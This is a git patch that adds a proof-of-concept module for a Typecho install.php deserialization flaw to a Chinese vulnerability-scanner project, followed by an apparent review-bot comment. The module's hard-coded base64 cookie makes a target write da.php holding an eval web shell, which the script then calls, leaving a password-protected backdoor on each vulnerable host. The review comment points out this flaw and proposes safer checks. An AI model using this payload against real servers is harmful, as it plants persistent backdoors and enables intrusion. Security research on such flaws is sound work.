From 98779e0b2d9c40d30abe94ecc7ccb123386ce9dd Mon Sep 17 00:00:00 2001
From: Lucifer1993 <297954441@qq.com>
Date: Sun, 5 Nov 2017 13:36:33 +0800
Subject: [PATCH] =?UTF-8?q?add=20poc=20typecho=20install.php=E5=8F=8D?=
 =?UTF-8?q?=E5=BA=8F=E5=88=97=E5=8C=96=E6=BC=8F=E6=B4=9E?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cms/cmsmain.py | 3 ++
 cms/seacms/seacms_search_jq_code_exec.py | 2 +-
 cms/typecho/__init__.py | 0
 cms/typecho/typecho_install_code_exec.py | 44 ++++++++++++++++++++++++
 pocdb.py | 1 +
 scan/arbitrarily_filefuzz_check.py | 8 +++--
 scan/xss_characterfuzz_check.py | 8 +++--
 7 files changed, 61 insertions(+), 5 deletions(-)
 create mode 100644 cms/typecho/__init__.py
 create mode 100644 cms/typecho/typecho_install_code_exec.py
diff --git a/cms/cmsmain.py b/cms/cmsmain.py
index 9548cd1..a9ff04c 100755
--- a/cms/cmsmain.py
+++ b/cms/cmsmain.py
@@ -6,6 +6,9 @@ referer: unknow
 author: Lucifer
 description: 包含所有cms漏洞类型,封装成一个模块
 '''
+#typecho vuls
+from cms.typecho.typecho_install_code_exec import typecho_install_code_exec_BaseVerify
+
 #foosun vuls
 from cms.foosun.foosun_City_ajax_sqli import foosun_City_ajax_sqli_BaseVerify
diff --git a/cms/seacms/seacms_search_jq_code_exec.py b/cms/seacms/seacms_search_jq_code_exec.py
index 0a5d55a..33b48bf 100755
--- a/cms/seacms/seacms_search_jq_code_exec.py
+++ b/cms/seacms/seacms_search_jq_code_exec.py
@@ -35,4 +35,4 @@ class seacms_search_jq_code_exec_BaseVerify:
 if __name__ == "__main__":
 warnings.filterwarnings("ignore")
 testVuln = seacms_search_jq_code_exec_BaseVerify(sys.argv[1])
- testVuln.run()
\ No newline at end of file
+ testVuln.run()
diff --git a/cms/typecho/__init__.py b/cms/typecho/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/cms/typecho/typecho_install_code_exec.py b/cms/typecho/typecho_install_code_exec.py
new file mode 100644
index 0000000..d28eccc
--- /dev/null
+++ b/cms/typecho/typecho_install_code_exec.py
@@ -0,0 +1,44 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+'''
+name: typecho install.php反序列化命令执行
+referer: http://p0sec.net/index.php/archives/114/
+author: Lucifer
+description: 漏洞产生在install.php中,base64后的值被反序列化和实例化后发生命令执行。
+'''
+import sys
+import requests
+import warnings
+from termcolor import cprint
+
+class typecho_install_code_exec_BaseVerify:
+ def __init__(self, url):
+ self.url = url
+
+ def run(self):
+ headers = {
+ "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
+ "Cookie":"__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6NDp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMjoiAFR5cGVjaG9fRmVlZABfY2hhcnNldCI7czo1OiJVVEYtOCI7czoxOToiAFR5cGVjaG9fRmVlZABfbGFuZyI7czoyOiJ6aCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NTY6ImZpbGVfcHV0X2NvbnRlbnRzKCdkYS5waHAnLCc8P3BocCBAZXZhbCgkX1BPU1RbcHBdKTs/PicpIjt9czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfZmlsdGVyIjthOjE6e2k6MDtzOjY6ImFzc2VydCI7fX19fX1zOjY6InByZWZpeCI7czo3OiJ0eXBlY2hvIjt9",
+ "Referer":self.url + "/install.php",
+ "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
+ "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
+ "Accept-Encoding":"gzip, deflate",
+ }
+ vulnurl = self.url + "/install.php?finish=1"
+ try:
+ req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
+ shellpath = self.url + "/da.php"
+ post_data ={
+ "pp":"phpinfo();"
+ }
+ req1 = requests.post(self.url + "/da.php", data=post_data, headers=headers, timeout=10, verify=False)
+ if r"Configuration File (php.ini) Path" in req1.text:
+ cprint("[+]存在typecho install.php反序列化命令执行漏洞...(高危)\tpayload: "+vulnurl+"\tshell地址: "+shellpath+"\t密码: pp", "red")
+
+ except:
+ cprint("[-] "+__file__+"====>连接超时", "cyan")
+
+if __name__ == "__main__":
+ warnings.filterwarnings("ignore")
+ testVuln = typecho_install_code_exec_BaseVerify(sys.argv[1])
+ testVuln.run()
\ No newline at end of file
diff --git a/pocdb.py b/pocdb.py
index 878ab47..e1982e6 100755
--- a/pocdb.py
+++ b/pocdb.py
@@ -24,6 +24,7 @@ class pocdb_pocs:
 "crossdomain.xml文件发现":crossdomain_find_BaseVerify(url),
 }
 self.cmspocdict = {
+ "typecho install.php反序列化命令执行":typecho_install_code_exec_BaseVerify(url),
 "Dotnetcms(风讯cms)SQL注入漏洞":foosun_City_ajax_sqli_BaseVerify(url),
 "韩国autoset建站程序phpmyadmin任意登录漏洞":autoset_phpmyadmin_unauth_BaseVerify(url),
 "phpstudy探针":phpstudy_probe_BaseVerify(url),
diff --git a/scan/arbitrarily_filefuzz_check.py b/scan/arbitrarily_filefuzz_check.py
index ec1692c..e9f59ee 100755
--- a/scan/arbitrarily_filefuzz_check.py
+++ b/scan/arbitrarily_filefuzz_check.py
@@ -188,5 +188,9 @@ class arbitrarily_filefuzz_check_BaseVerify:
 if __name__ == "__main__":
 warnings.filterwarnings("ignore")
- testVuln = arbitrarily_filefuzz_check_BaseVerify(sys.argv[1])
- testVuln.run()
+ if len(sys.argv) < 2:
+ cprint("usage: python3 arbitrarily_filefuzz_check.py http://test.com/download.php?file=FUZZING", "cyan")
+ cprint("[*]将需要测试文件操作参数替换为FUZZING即可", "cyan")
+ else:
+ testVuln = arbitrarily_filefuzz_check_BaseVerify(sys.argv[1])
+ testVuln.run()
diff --git a/scan/xss_characterfuzz_check.py b/scan/xss_characterfuzz_check.py
index 184384e..28cd5c1 100755
--- a/scan/xss_characterfuzz_check.py
+++ b/scan/xss_characterfuzz_check.py
@@ -116,5 +116,9 @@ class xss_characterfuzz_check_BaseVerify:
 if __name__ == "__main__":
 warnings.filterwarnings("ignore")
- testVuln = xss_characterfuzz_check_BaseVerify(sys.argv[1])
- testVuln.run()
+ if len(sys.argv) < 2:
+ cprint("usage: python3 xss_characterfuzz_check.py http://test.com/test.php?id=FUZZING", "cyan")
+ cprint("[*]将需要测试XSS的参数替换为FUZZING即可", "cyan")
+ else:
+ testVuln = xss_characterfuzz_check_BaseVerify(sys.argv[1])
+ testVuln.run()
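Review bot: `run` in the new typecho_install_code_exec.py verifies the bug by planting a persistent backdoor — the hard-coded `__typecho_config` cookie decodes to a serialized `Typecho_Feed`/`Typecho_Request` pair whose `screenName` is `file_put_contents('da.php','<?php @eval($_POST[pp]);?>')` filtered through `assert`, and the follow-up POST to `/da.php` only confirms it landed — and nothing in the hunk removes `da.php` afterwards, so every host this scanner flags is left with an unauthenticated eval shell at a guessable path. Either switch to a payload whose only effect is in the response (have the asserted code echo a marker and check for it, if the output appears in the `install.php?finish=1` reply — this means regenerating the cookie) or at minimum send a second request that unlinks `da.php` and state the artifact plainly in the module docstring. The bare `except:` around both requests also reports every failure, including `KeyboardInterrupt` and a failed `da.php` POST, as "连接超时"; narrow it to `except requests.RequestException:`. Minor: `req` is never read and `shellpath` duplicates the URL built inline in the `requests.post` call — pass `shellpath` there and drop `req`.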